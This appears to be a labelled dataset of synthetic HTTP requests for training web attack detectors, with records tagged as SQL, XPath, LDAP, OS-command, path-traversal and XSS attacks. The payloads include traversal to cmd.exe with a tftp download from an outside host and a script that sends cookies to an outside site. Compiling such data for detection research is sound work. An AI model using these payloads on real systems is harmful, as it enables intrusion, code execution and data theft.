GET /hWqTPr./orQitplGoa/niene2Oah/tA2winntp9/qD6XF_FEYfu/oaboF-ghEzWh/ert/HpZLCstyleV6j5execwget/nernimbiri5oEuT55o/B6rm7/vAa.css?anb7eitedzpAiH=gezzP_3LsR&xk7phpQEI=5&kN84divi-@tHvR=trnry0d%7Cs&evoy1ioLed7t=stRHauago0rkg&itehmfuoat=%3C%21--+++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5Clho8%5ChravrielA%5Cevetazn.exe+++++d%3A%5Cdldrsin%5Cwww.tise.org%5Ceaoafalor%5Cdatabase.mdb+++%2Fx++exporttofoxpro%22--%3E&eHxEywsOedi4=886117988 HTTP/1.0
Host: www.dsIz.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15;q=0.6, utf-7
Accept-Encoding: *;q=0.8
Accept-Language: xL3rhs-pb;q=0.4, bn-in;q=0.1
Cache-Control: Bthtyne=d9mau
Client-ip: 34.12.183.217
Cookie: q7uWlQLXI5D=tQWNVisew
Cookie2: $Version="373"
Date: Tue, 28 Apr 09 08:59:28 CET
ETag: "aZA6H-lbM.cdD6r"
Expect: dwEIlasn
From: Yphp8ra@sCnoSst6.de
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Sat, 19 Apr 08 22:02:03 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 5973
MIME-Version: 9.6
Pragma: k1ih5L=eerhtEq
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: NTLM ZW9zcnRmcjVvaWUwbGVyNmxlZWFpN3NhbHRpNjdGZXpvdG5lNGJkNGZlaGVoaW1j
Range: -2115,0045-233,-51
Referer: /f6nilou.mp3
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: taslhree/2.0.3.6
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: identity
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40304
Start - Id: 49725
class: XPathInjection
GET /winntL7bwbodyNR/dj-nZL/vdVeggwjWtLJccX/nsaosrE36LaAnoantEe/EtenE/yytmplfC/tait/bRvme08WAU8gUaq252.htm?imaba=servicesqhrixbta&bPd60V0=unione&nS=5965+++++or+1%3C+++iyet%2Fj%2Fa%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D835%5D++++or+++163%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&eorleridhEn=5&tnn=7927&tsmnincf=%3BinputQfu HTTP/1.0
Host: www.etyMt.net
Connection: der3hbt
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.2, big5, euc-kr;q=0.5, windows-1258;q=0.5, iso-8859-15;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 173.103.247.250
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="6"
Date: Sun, 31 May 09 13:12:58 CET
ETag: "JYMP4D0.htFnvfn"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Fri, 07 Dec 07 19:25:54 UTC
If-Unmodified-Since: Tue, 08 Dec 09 02:01:09 CET
If-Match: "9w1jVsfeOf0efabXwyI"
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 2678
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: NTLM bHdycmRnbWVyYXJzZXR0a28zOU0ybW1yZmVoZ3dlZXRw
Range: -37003,-5,-1
Referer: /tidsers/oekwRhc.png
TE: trailers
Trailer: Via
User-Agent: Mozilla/6.2 (compatible; Konqueror/7.1; Linux i586; csecw)
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49725
Start - Id: 35091
class: SqlInjection
GET /beeuekir5sii/duEZtaneqcha4/eceisHctOreoisigur/tai1rahzRcaL/klN6Gn/atbqqYyBv2NFU6NvNZY/oaXF9gdsrl/s7bD4gW9/hok1c8ut4itfTo/oldwiiteilmicedG/wF4bhAhs5axDQdY/phslfwha80.cfm? HTTP/1.1
Host: www.hbsA.org:80
Connection: yradt
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: elo'/**/UNION/**/SELECT/**/qauemn0itm/**/FROM/**/dba_users/**/WHERE/**/ei/**/like/**/'%25
Cookie: Wod4sersnsot=a;ueEoe=57490428;bblike0dkp=isdf6adde;olMQ2PA=oNtgy;dhzsasfs=044
Date: Sat, 14 Oct 06 15:27:20 UTC
If-Modified-Since: Sun, 24 Jan 10 13:51:01 GMT
Max-Forwards: 8
Authorization: Basic eW9Pa3QyOmZkdGs=
Range: 3473-9
Referer: http://bwatim.ch/zrfR.png
Trailer: Authorization
User-Agent: Mozilla/6.1 (Windows; U; WinNT 3.7; rH-bh; rv:8.9.7) Gecko/56661515
Upgrade: njf/2.0, p8qf/8.5, qie/3.4
----: ----------------------------------

null

End - Id: 35091
Start - Id: 44830
class: PathTransversal
GET /DQhueeansi/h20-Sn4XxEw4MFBQSg1H/zxwl9iR/iaFdQ9lndvXdnIu-Y7/1D/d4hc/AZbbs/ogU/-4Hd.-bA96/tBEPNN2a90VB1@78K/4OEu6CQM.p@D9Ay/asaolt8m.mdb?pe=78461690&hi=+decomuPp&tog2=Foetseriac&L8ET1N6yH=file%3A%2F%2F%2FW%3A%2Feylf%2Fshf%2Fhdpy6.xml&4edasStookcmEf=e83yt&c-DCAl@systemMsx=yp&axsyrnedt=fw&IpnaaneEstoef=9%26&synoeottpjd=1651 HTTP/1.0
Host: www.NngddTp.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: b1tnu=ewtr
Client-ip: 92.163.213.217
Cookie: lsGFcuaatksqdt=nvvars;ttpeabnt=67759968;tR=eegtorsafsrdnst;h1iaoai=zc3 nfA8]af
Cookie2: $Version="00"
Date: Mon, 05 Dec 05 07:16:02 UTC
ETag: W/"LAeUV2MDP1zNaGt61NV-"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 7
MIME-Version: 3.1
Pragma: e=t2otyk
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: eH4teM jsxnoc=5ihxiqi
Range: 49-580233,702708-4982,-8
Referer: /rarer5zi/xn5dt/vootl/7ncdoa/o5frh.msf
TE: gzip,chunked;q=0.1
Trailer: From
User-Agent: i9cjeohsp (uaXVlSp)
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/5.3 241.190.43.239:8475, 1.1 109.50.57.136, 5.1 www.fwagr.jpg
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44830
Start - Id: 44293
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.iitd.fr:50
Connection: close
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: identity, gzip;q=0.7, gzip;q=0.6, compress;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 171.2.10.60
Cookie: KsIiji=0+I;nxltRtfopySdS=tbc 6;teiGrt3eveo=e
Cookie2: $Version="583"
Date: Wed, 27 Dec 06 13:49:10 GMT
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 27 Sep 09 07:31:09 GMT
If-Match: *
If-None-Match: *
If-Range: "PnObIr1--fPNEcLS0iL"
Max-Forwards: 2554
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 77-00,194-
Referer: /Si4t/oOrjsgsy/edmh0g.fgf
TE: chunked,chunked,gzip;q=0.6
Trailer: If-Match
User-Agent: flso3in
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6071x5916
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: Oserkm; tohe=lu8n
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 11968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44293
Start - Id: 39054
class: LdapInjection
POST /nhZ9.pl? HTTP/1.0
Content-Length: 9
Content-Language: 1opehLR7
Content-Encoding: deflate
Content-Location: /t0aie/cPihll/THor/l6aint/sdg5Tx.png
Content-MD5: cWhlbWVsZmE4cm9sYWhhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Dec 05 07:20:35 UTC
Host: www.J8aoT.be:364
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: e4t)( |  (ajs=*)
Client-ip: 9.14.23.219
Cookie: d6i=8;lroeceoffp3=a9';dutvmgsettthf=aodrop1SNieNm3
Date: Sat, 29 Sep 07 02:13:02 CET
ETag: "@twgr0paMp1iGoCMp4"
Expect: 100-continue
If-Modified-Since: Thu, 26 Nov 09 04:22:15 UTC
If-Unmodified-Since: Mon, 16 Mar 09 17:11:13 UTC
If-None-Match: *
If-Range: Thu, 16 Oct 08 08:31:25 CET
Max-Forwards: 755
Referer: http://www.teuurodo.cz/soi6cmie/Ieiute/tDeias.tar
TE: deflate;q=0.7
Trailer: User-Agent
User-Agent: antmnP/1.9.1.2.5
Via: FTP/4.1 38.23.49.19
Transfer-Encoding: st9k
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iqlor=200

End - Id: 39054
Start - Id: 35960
class: PathTransversal
GET /ttTXL/tdpeeres/eeoxdatre6tntser/kb8v.jsp? HTTP/1.1
Host: www.soau.st:520
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: b:\winnt\boot.ini
Cache-Control: Ocda=hcrgaa
Client-ip: 204.128.198.209
Cookie: cwtci=248577;8oA2mtgrrsrlera=142699524;EirUiu=rfwhere
Cookie2: $Version="477"
Date: Tue, 04 Sep 07 05:53:55 CET
ETag: W/"aouz35NAs@YcM8nA5"
Expect: 100-continue
From: La4Eao@gofiiia.net
If-Modified-Since: Tue, 05 Apr 05 22:44:30 GMT
If-Unmodified-Since: Sun, 22 May 05 23:18:50 UTC
If-Match: "N2c8pSSAlOHUUlRhf"
If-None-Match: "8OP1Ie6zRIOR6aQZyhaV"
If-Range: Fri, 18 Feb 05 24:59:59 GMT
Max-Forwards: 2309
Pragma: no-cache
Proxy-Authorization: cri1s pdlvn=ufiroeAL
Authorization: Basic dWVpbXRhOG46YTRhYWVk
Referer: /hodlow6n/a8mSiyv/ctsaeent.php4
TE: deflate,chunked;q=0.6
User-Agent: Mozilla/7.4 (X11; U; Solaris 3.6; q9-to; rv:0.8.3) Gecko/29522986
UA-Disp: 5304,8603,8
UA-OS: Linux
UA-Color: color16
Via: HTTP/5.5 www.rT4iaat.gif
Transfer-Encoding: gzip
Upgrade: XetBas/4.5, eiTt/2.0
Warning: 141 www.rprnhm.htm "oseubss" "Mon, 28 Jan 08 18:50:04 UTC"
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 35960
Start - Id: 38617
class: LdapInjection
GET /rncnRemgIm8leRegaty/n.P6y-Hy/oOvbcyrE/s4f9xTa/b1f0/xRry@Hpn/iA6ttsoe.png?Jtsar3rnc3q=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sidotuo=eeF9&ein3hgLhnseynd=Eo&whtn=OifdO1Ediv%40odropemhlRs%2Fmb&t1Elsegln=0q7o&M7MtMdP8_H=m+u%40&3qvarM=-%2Fd&e7rm=%5Dver%25mc3%7E%5C%7C+%3Dee%3Btb+&oer7s=22409558&umz=3mE&ygers=iREtTPuH HTTP/1.0
Host: www.oyOtwise.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-10646-ucs-2;q=0.6, x-mac-korean;q=0.5, x-mac-ce;q=0.8
Accept-Encoding: compress, compress
Accept-Language: bCt001wN-aola, k8i-rlcepng;q=0.0
Cache-Control: no-transform
Client-ip: 54.188.209.237
Cookie: C6H0is=aLEiexectt/prLctmp;ve2mto=3a;tei3Y3mcms=t3etn0icpg;jc98odu=r0o-kt8nw8likeinnacE
Cookie2: $Version="2"
Date: Sat, 16 Sep 06 16:17:17 CET
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: RwOaaelp@gdhst.com
If-Modified-Since: Sat, 09 Feb 08 21:05:11 GMT
If-Unmodified-Since: Wed, 06 Apr 05 20:29:20 UTC
If-Match: "CFnN3qlGyaNj@Mz"
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: "2nrs__Eu2QeAlWIfe7Y"
Max-Forwards: 98
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM ZGk5aGVhQXRzdGRjZXlBaWd0ZXB0bzhuMG1ib3NvbnA2bG5h
Range: 863-0,-075,-8921
Referer: /rclti0/esOneaop/eIvawem.msf
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: ngrnncasj/6.4.9
UA-CPU: x86
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: 3.0 www.lntsudh.jpeg, FTP/4.1 8.52.254.109, 6.5 www.6egGeA.gif
Transfer-Encoding: identity
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 221 www.yahrm.jpeg "dsaeopr0wq2uo" "Thu, 14 Jul 05 01:23:19 CET"
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38617
Start - Id: 36801
class: OsCommanding
GET /nc-_y0r.gif?tratag=672&lddxeJinfltiib=tll5dql&hnhl=96&formit8eaaOo0=ligH&mn0rnewabysU=i-gVR83%40k&ureNrel=%2Fbin%2Fps%2500+++%7C&eeyoAiigun=tnui2noshm4pd&fCiwmeo4T=mis&uk15mtdRmo6bare=406&veolyLeertseh=PCr%40+passwdu%27noneo&1nixo=etn%25uesrEi+s8%25uora&sdax1DGa=ahvgD6.5 HTTP/1.0
Host: www.1C8ry.st
Connection: spg24s
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 175.104.211.224
Cookie: sD7cnl=k;ArclzwcDaLalox=06207701;ip4=7sa;wM0i=tlnu8u;AJHG=08vrex;ncCunrlawaDy2ir=nn6
Cookie2: $Version="08"
Date: Tue, 07 Mar 06 11:37:51 UTC
ETag: W/"8334JjPUOIE_-tVFu"
Expect: TDeis
From: aE6onr@dfqge.it
If-Modified-Since: Tue, 02 Sep 08 21:53:29 GMT
If-Unmodified-Since: Mon, 19 Apr 10 16:03:18 GMT
If-Match: *
If-None-Match: "Aif7YJnnT6Pe-lSeVYHD"
If-Range: Wed, 20 Oct 04 21:18:31 CET
Max-Forwards: 633
MIME-Version: 1.3
Pragma: Hlrqitr=Iu
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: Basic Tzh1VDplNW5t
Range: -696,54746-
Referer: /ileeaieu.nsf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: pZk26R http://www.iu8t.biz
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 0.0 www.asacxne.html, HTTP/4.3 www.7eikpqN.jpeg, 4.9 248.121.56.39:1523
Transfer-Encoding: identity
Upgrade: taos/1.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36801
Start - Id: 41974
class: SqlInjection
GET /ois2dybnthri0iaXi/5K2Yjcc2xHkpNautoexec/yyq4.Z.bDVXp/o31t6o@JvqWVeCCZx2/paoanhr7n/bs.So/sgJxM/2dTlsdzSot/zBfSd1cinsertTxxtermhc9f/dIo/28htiolnKjrnutx3et/arCctOgIxNimnOOzy.htm?onerhup=4739&ofoeahma0soort6=h6jbDlcX&wuete6sh3h=%3Fthttps+xueb%5Ddsitthtou&e6IiyathrbMoon=33399335&ynueioHrtrdb5rn=%27+or+++id+++in++++%28+select++*++++from+++++user_db++%29&tAOpn3ued=ar%25eweoSe%29%27l&y@3gkw91-=x97g5&ATee=nwinnt&kDLN2no7os=ptvcfsaedEeNEi HTTP/1.0
Host: 143.67.65.212
Connection: aj8wLe
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 124.187.36.33
Cookie: 2cr5wi6taye=rBYh;passthru6QYNzRHy=6334936;z8taxhDean=~lt9ei ;nedanbst6ecnma8=6;Ntliiyi=23
Cookie2: $Version="6"
Date: Mon, 22 Aug 05 18:01:06 GMT
ETag: "F6yDl2ELctqx5Q34"
Expect: 100-continue
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Wed, 19 Apr 06 14:17:42 GMT
If-Match: *
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 1784
MIME-Version: 0.8
Pragma: h=6
Proxy-Authorization: Basic Y3Q2ZDpxdGVh
Authorization: NTLM c25kYW9pSXRyOWh3bHd0VGVlbmlJZWxtYVJTYmVidG9yeUZucHRkbGM4M3RkeXU=
Range: -221064
Referer: /emawiae/nesitca/iaetg/far2/pheau.pl
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: gteynh (rF6BzbQb8b; y8Xjx0UkW@; rxzR@b.mUt; mHDhUM4; hG76nzm2D)
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: HTTP/2.7 www.e1fsorj.tiff, 2.5 85.169.153.48, 4twbt/4.1 59.126.200.32
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 701 120.215.22.150 "m6Umsse8crm8abges" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 382676240
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41974
Start - Id: 43703
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: 213.172.174.108
Connection: Nzaue
Accept: image/*
Accept-Charset: iso-8859-2;q=0.0, iso-8859-15;q=0.1, iso-8859-8-i;q=0.2, iso-8859-3;q=0.6, iso-8859-6
Accept-Encoding: deflate;q=0.2, deflate;q=0.7, compress
Accept-Language: rraa-r, xIaCt-2, 3-r;q=0.4
Cache-Control: Rioyio1='h'
Client-ip: 152.233.157.213
Cookie: ns4e=90853;dEeceetomm1albr=iuEPGH3yutU;1winntTPPv9TBlikemgroup by=aJf;llups=UzOiaer
Cookie2: $Version="916"
Date: Sat, 21 Feb 04 22:45:24 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Wed, 14 Mar 07 04:58:42 UTC
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: "RDBcx-hQ1ZVcUqTD-"
If-Range: "ayE5StEBc5.RGeB-K"
Max-Forwards: 09
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest username="6Yfo3"
Authorization: Digest nc=D9942BcD
Range: 251-3,844750-,3500-
Referer: http://www.tudOn.cz/7sdo0Wea/gttnHnnh/esmatt/eedesiiC/ragvidwe.cfm
TE: trailers
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 0.4; hr-ee; rv:8.2.8) Gecko/69559051
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: 2.6 115.72.82.89, ofnN/5.0 120.196.83.9
Transfer-Encoding: gzip
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 708 148.220.94.123 "t7popsifwheZr" 
X-Forwarded-For: 253.164.33.60
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43703
Start - Id: 46608
class: XSS
GET /sri7i9uyFguEhd.jsp?HyIGaXlogNf@=nioihsGasesitan6A&peexhoO1=er5eTh&dozel=eD HTTP/1.0
Host: www.ltaT.gov
Connection: keep-alive
Accept: application/x-tar, video/*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, compress, identity;q=0.0, gzip
Accept-Language: <bgsound    src  =   "     javascript:  [document.location.replace  ('http://www.elasorro.com/cgi-bin/tiet.cgi'+document.cookie);]     " >
Cache-Control: no-transform
Client-ip: 42.100.67.21
Cookie: lt5ysaekiioe=cQB;oadedetc=afzaanesothsr;yht=omhdrgbu;irgbEhdi=ae;p4FyyB=aRsN
Cookie2: $Version="22"
Date: Sun, 28 Feb 10 05:05:46 CET
ETag: W/"i1SzQL9_A_G6IGY"
Expect: 100-continue
From: cmafia1u@4a9he51St.com
If-Modified-Since: Sun, 19 Jul 09 18:13:17 GMT
If-Unmodified-Since: Sat, 03 Dec 05 06:20:49 UTC
If-Match: "azZgVZ@U8xVGB46nAqRs"
If-None-Match: *
If-Range: Sat, 24 Apr 04 11:29:04 CET
Max-Forwards: 3605
MIME-Version: 0.9
Pragma: ttbdoiew=e8
Proxy-Authorization: Basic bGJzaWFkN2E6YXR0enU=
Authorization: NTLM bHFmYXNyZmNOcGlhYzN0bHBUdWV3YWtvaWF0ZWxEaXMx
Range: 29-,197659-,4-7273
Referer: /e4uepti.asmx
TE: chunked;q=0.0,deflate;q=0.9
User-Agent: Mozilla/0.5 (X11; U; Solaris 6.5; td-bl; rv:3.7.4) Gecko/49625248
UA-CPU: x86
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 950x529
Via: w4u/1.8 140.252.20.223, 1.5 www.pStTte.htm:272
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 105 192.184.242.29 "Ttdmeee" 
X-Serial-Number: 1492216071266742097
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46608
Start - Id: 37611
class: LdapInjection
PUT /26upOO2a-rWVI/_fvddZyW/fo9e6ihinuujthn/icesnorwnuTk/dZu9/sl4_tH49gvcEpV/4z/nZ.4hM9/6Enso9rFEhrht/ljsarr70ssNiNld/ctaonerc8/o00dv.hOO1a@.dll? HTTP/1.1
Content-Length: 42
Content-Language: 7,pedwotw
Content-Encoding: identity
Content-Location: http://www.9mao0.ch/zs9g/jinrod.jpg
Content-MD5: ZWlBdzVlaXRrb05XdGVkdg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Nov 08 10:01:45 CET
Last-Modified: Wed, 17 Jun 09 23:05:25 GMT
Host: 91.246.39.253
Connection: close
Accept: application/*, image/gif
Accept-Charset: x-mac-hebrew;q=0.0
Accept-Encoding: 
Accept-Language: 2gbrn-eeaacimr, l45koo6-A9ho, Hfw3-mueaee;q=0.9
Cache-Control: only-if-cached
Client-ip: 34.23.57.157
Cookie: ze9BlocationZ=732496;9etha9stahwo9=eandhpg;.ByWM_eEdelete=Sde;iamJsi8ePtC7N=libde]ei ohssg/p\e
Cookie2: $Version="98"
Date: Tue, 07 Sep 04 10:17:22 UTC
ETag: "6t0u8o_yH@NZvJitW"
Expect: tadtati=ehee;deeu=eDczsw
From: tiwatv@kDh9.de
If-Modified-Since: Sun, 11 Apr 04 08:58:26 GMT
If-Unmodified-Since: Fri, 30 Mar 07 15:18:20 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Nov 08 22:53:05 GMT
Max-Forwards: 94
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: 9zero hxpb=aiseetc
Range: 9-3321,97916-131
Referer: http://iaDep8.fr/ei6dems/o1os.bin
TE: trailers
Trailer: Accept-Language
User-Agent: nhotE (gUbE8n; sjxjb2; 5RQl@2v; k0zPXJzc)
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 770x317
Via: 8.1 www.aior.html:2443, 0.6 www.x2aputJ.html
Transfer-Encoding: ueeA
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 884 75.45.43.166 "cemm8l" "Sun, 10 Jul 05 20:22:37 CET"
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

senbmTtu=)   (    |(ce6al=df*)

End - Id: 37611
Start - Id: 44246
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.untlnrk.st
Connection: ttalaetw
Accept: video/*, text/xml;q=0.8
Accept-Charset: x-mac-arabic, utf-7
Accept-Encoding: identity;q=0.0, identity;q=0.1, identity;q=0.6, gzip;q=0.5, identity
Accept-Language: *;q=0.4
Cache-Control: 8='s7'
Client-ip: 182.20.30.117
Cookie: WwvCwXx=lc
Cookie2: $Version="9"
Date: Sun, 15 Jul 07 21:49:06 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Wed, 29 Sep 04 05:42:54 GMT
If-Unmodified-Since: Tue, 15 Sep 09 04:19:57 GMT
If-Match: "jSRoJer_RD4y28gIjjo"
If-None-Match: "nHqelmTAXyPEbWth"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic Y3U1aWE6YXQ1ZQ==
Authorization: Digest nonce
Range: -877,9675-235022
Referer: /T8Ndh7nd/Shh4g.php3
TE: trailers
Trailer: User-Agent
User-Agent: vjnkb/2.7.4.7.9
UA-CPU: Sparc
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: 6ris; osgnkcE=urwji
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44246
Start - Id: 45450
class: PathTransversal
GET /sscoF.dyfIYKF/hh/rYn/D0ar3_byeF1usrBjML.png?Eo9Rtmoafiri=ee5&tryenhA=afesbgproSo&bgsoundYht=9584&absxng=e+or&ao8ayr=eXi%26%40oHt+ecmdlei3&ea7feuroNau2n=mA%4015gojf%40_&ns7errmi=9507&eU=2992&@DASFaugroup bycu=khescn0az0en%2BHmailhDr&8mieck6=04232859&5t=6015029439&3pfAgnkn4qcX=seOWwl.fG&ghxtaiNh=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.resz.gov
Connection: keep-alive
Accept: text/html, text/*, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.4, compress, identity;q=0.0
Accept-Language: *;q=0.6
Cache-Control: max-age=700
